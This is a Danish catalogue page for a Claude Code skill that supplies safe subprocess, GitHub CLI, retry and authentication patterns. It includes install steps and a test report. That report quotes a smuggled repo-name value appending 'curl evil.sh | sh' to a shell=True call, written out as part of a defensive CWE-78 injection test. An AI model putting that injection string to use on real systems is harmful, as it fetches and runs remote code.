API Integration Patterns

Underproces-sikre API/CLI-mønstre: ingen shell=True, whitelisted kommandoer, retry backoff, tokenvalidering.

Af akaszubski · akaszubski/autonomous-dev

Testet · Virker ★ 8.4/10

API Integration Patterns — Underproces-sikre API/CLI-mønstre: ingen shell=True, whitelisted kommandoer, retry backoff, tokenvalidering.

Hvad det gør

En reference-mønster-skill, der leverer sikre underproces-, GitHub CLI-, retry-with-backoff-, autentificerings- og rate-limiting kodemønstre, når Claude skriver ekstern API- eller CLI-integrationskode. Udløses ved nøgleord som subprocess/gh-cli/API-call/retry/auth og udelukker eksplicit interne funktioner eller kun konfigurationsredigeringer.

Testrapport

Reel CWE-78 test: baseline-kode brugte shell=True med et f-string repo-navn, hvilket tillod en konstrueret repo-værdi at tilføje 'curl evil.sh | sh'; færdighedens argv-array + shell=False version passerede den samme ondsindede streng gennem gh som et inert argument. Konkret, ikke kosmetisk.

Testet: 2026-07-15 · Claude Code 2.x (agent harness)

Installation

git clone https://github.com/akaszubski/autonomous-dev
cd autonomous-dev
mkdir -p ~/.claude/skills
cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns

Kommandoer og eksempelprompter

  • /api-integration-patternsUnderproces-sikre API/CLI-mønstre: ingen shell=True, whitelisted kommandoer, retry backoff, tokenvalidering.

Skills udløses af almindelige forespørgsler — ingen kommandoer at huske. Efter installationen aktiverer prompter som disse skillen (på engelsk):

  • Write a Python function that lists GitHub issues via the gh CLI
  • Add retry logic with exponential backoff to my API client code
  • Help me safely handle subprocess calls without shell injection risk